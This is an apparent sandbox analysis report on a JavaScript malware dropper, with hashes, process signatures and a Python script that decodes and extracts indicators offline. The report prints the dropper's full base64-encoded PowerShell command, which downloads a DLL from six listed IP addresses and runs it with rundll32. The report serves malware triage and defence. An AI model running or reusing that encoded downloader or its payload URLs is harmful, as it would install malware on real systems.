Analysis
- max time kernel: 31s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 25/03/2023, 01:53
Static task: static1
Behavioral task: behavioral1
- Sample: 3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: 3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
- Resource: win10v2004-20230220-en
General
- Target: 3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
- Size: 76KB
- MD5: bdbc96baa80959b9567644cfd9cfa108
- SHA1: 74454032b37ae698615dc3db4d7f4eb47a9aa596
- SHA256: 3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e
- SHA512: b6c876b7304b8467f46402e449b7951719844d73d18c9f5b06be279f4d26a7c2ff796dc5810158cf771badacf3a2b63689b626b3989604c422280bf718fdcfe4
- SSDEEP: 1536:+GEcysfmIvfU3FGXpF266XPOBgtEc5zOdqBHcnyFfIruavQGWMaMfqRwqwcIkisb:+QysfmIvfU3FGXpF266XPOBgtEc5zOde
Malware Config
Extracted URLs (the six payload locations embedded in the encoded PowerShell command shown in the process tree; the script tries them in this order and stops at the first host that serves a large enough file):
- http://103.214.71.131/gdg77dzSUN7N.dat
- http://198.44.140.75/ZDaZZLNJq.dat
- http://87.236.146.53/mSVe5fds.dat
- http://154.7.253.203/Vodubu.dat
- http://137.74.39.237/LM0g9Nw.dat
- http://139.180.172.203/ajyMC.dat
Signatures
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 896, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 896, process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1308 wrote to memory of 896; source process wscript.exe, procid_target 28 (the same parent-to-child event recorded three times; procid_target is the sandbox's own process index, not a Windows PID)
The first two signatures fire for powershell.exe in most sandbox runs and carry little weight on their own; the actionable finding here is the wscript.exe to powershell.exe chain with an encoded command line.
Processes
1. C:\Windows\system32\wscript.exe (PID 1308)
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 896, child of 1308)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwB0AHIAbwBtAGEAdABvAGwAaQB0AGUATQBlAHQAYQBzAHQAZQByAG4AdQBtACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAMAAzAC4AMgAxADQALgA3ADEALgAxADMAMQAvAGcAZABnADcANwBkAHoAUwBVAE4ANwBOAC4AZABhAHQALABoAHQAdABwADoALwAvADEAOQA4AC4ANAA0AC4AMQA0ADAALgA3ADUALwBaAEQAYQBaAFoATABOAEoAcQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4ANQAzAC8AbQBTAFYAZQA1AGYAZABzAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANwAuADIANQAzAC4AMgAwADMALwBWAG8AZAB1AGIAdQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMANwAuADcANAAuADMAOQAuADIAMwA3AC8ATABNADAAZwA5AE4AdwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADEAOAAwAC4AMQA3ADIALgAyADAAMwAvAGEAagB5AE0AQwAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAbgBkAGUAbgBvAG0AaQBuAGEAdABpAG8AbgBhAGwAaQBzAG0AIABpAG4AIAAkAFMAdAByAG8AbQBhAHQAbwBsAGkAdABlAE0AZQB0AGEAcwB0AGUAcgBuAHUAbQApACAAewB0AHIAeQAgAHsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABVAG4AZABlAG4AbwBtAGkAbgBhAHQAaQBvAG4AYQBsAGkAcwBtACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAUwB1AHQAdABpAG4ASABhAHAAdQBrAHUALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsACwARwBMADcAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
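Decoding the -encodedcommand argument above (an added triage example, not part of the Triage report or of the sample): the blob is base64 over UTF-16LE and decodes to a PowerShell downloader that sleeps 3 seconds, walks the six URLs from the Malware Config in order, fetches each with Invoke-WebRequest and a 16-second timeout into $env:TEMP\SuttinHapuku.dll, and as soon as a response of at least 100000 bytes lands it runs start rundll32 on that DLL with export GL70 and breaks out of the loop; a failed request sleeps 3 seconds and moves on to the next host. The script below takes the report's own encoded string, decodes it, pulls those indicators out with regular expressions written for this pattern (SAMPLE_CMDLINE is reconstructed from the process tree above, and all function names and regexes are my own, not anything from Triage), and replays the loop's control flow against a constructed fetch stub to show why one run contacts only the hosts up to the first that serves a large enough file.

```python
import base64
import re

# The -encodedcommand argument copied verbatim from the process tree above
# (this is the report's own artefact, not constructed data).
ENCODED = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwB0AHIAbwBtAGEAdABvAGwAaQB0AGUATQBlAHQAYQBzAHQAZQByAG4AdQBtACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAMAAzAC4AMgAxADQALgA3ADEALgAxADMAMQAvAGcAZABnADcANwBkAHoAUwBVAE4ANwBOAC4AZABhAHQALABoAHQAdABwADoALwAvADEAOQA4AC4ANAA0AC4AMQA0ADAALgA3ADUALwBaAEQAYQBaAFoATABOAEoAcQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4ANQAzAC8AbQBTAFYAZQA1AGYAZABzAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANwAuADIANQAzAC4AMgAwADMALwBWAG8AZAB1AGIAdQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMANwAuADcANAAuADMAOQAuADIAMwA3AC8ATABNADAAZwA5AE4AdwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADEAOAAwAC4AMQA3ADIALgAyADAAMwAvAGEAagB5AE0AQwAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAbgBkAGUAbgBvAG0AaQBuAGEAdABpAG8AbgBhAGwAaQBzAG0AIABpAG4AIAAkAFMAdAByAG8AbQBhAHQAbwBsAGkAdABlAE0AZQB0AGEAcwB0AGUAcgBuAHUAbQApACAAewB0AHIAeQAgAHsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABVAG4AZABlAG4AbwBtAGkAbgBhAHQAaQBvAG4AYQBsAGkAcwBtACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAUwB1AHQAdABpAG4ASABhAHAAdQBrAHUALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsACwARwBMADcAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

# Constructed process-creation record shaped like the report's process tree,
# so the extractor is exercised on a full command line, not on the bare blob.
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '-encodedcommand "' + ENCODED + '"'
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match "-e" optionally followed by c/n and more letters.
_ENC_FLAG = re.compile(r'-e(?:[cn]\w*)?\s+"?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
_URL = re.compile(r'https?://[^\s"\'(),;]+')
_DROP = re.compile(r'\$env:TEMP\\+([\w.-]+\.dll)', re.IGNORECASE)
_EXPORT = re.compile(r'rundll32\s+\S+?\.dll,(\w+)', re.IGNORECASE)
_SIZE = re.compile(r'\.length\s+-ge\s+(\d+)', re.IGNORECASE)
_TIMEOUT = re.compile(r'-TimeoutSec\s+(\d+)', re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8. Pad defensively:
    command lines copied out of logs often lose trailing '=' characters."""
    blob = blob.strip().strip('"')
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def extract_indicators(script: str) -> dict:
    """Pull the triage-relevant facts out of the decoded downloader."""
    urls = _URL.findall(script)
    drop = _DROP.search(script)
    export = _EXPORT.search(script)
    size = _SIZE.search(script)
    timeout = _TIMEOUT.search(script)
    return {
        "urls": urls,
        "dropped_file": drop.group(1) if drop else None,
        "rundll32_export": export.group(1) if export else None,
        "min_payload_bytes": int(size.group(1)) if size else None,
        "timeout_sec": int(timeout.group(1)) if timeout else None,
        # download-and-execute: fetches over HTTP and hands a DLL to rundll32
        "download_and_execute": bool(urls and export),
    }


def analyse_command_line(cmdline: str) -> dict:
    """Find an encoded-command flag in a process command line and triage it."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return {"encoded": False}
    script = decode_encoded_command(m.group(1))
    return {"encoded": True, "script": script, **extract_indicators(script)}


def simulate_downloader(urls, fetch, min_bytes):
    """Replay the script's control flow without touching the network: try
    hosts in order, keep the first body of at least min_bytes, stop there.
    fetch(url) returns bytes or None (None models the try/catch failure path;
    the 3-second sleeps are omitted). Returns (executed_url, hosts_contacted)."""
    contacted = []
    for url in urls:
        contacted.append(url)
        body = fetch(url)
        if body is not None and len(body) >= min_bytes:
            return url, contacted
    return None, contacted


if __name__ == "__main__":
    result = analyse_command_line(SAMPLE_CMDLINE)
    for key, value in result.items():
        if key != "script":
            print(f"{key}: {value}")
```

Because the loop breaks at the first host that returns at least 100000 bytes, the network IoCs of a single sandbox run can list fewer hosts than the Malware Config above; the static decode is the authoritative set. The size gate also means a dead host that answers with a short error page is skipped rather than executed, so a blocked or sinkholed first URL does not stop the chain.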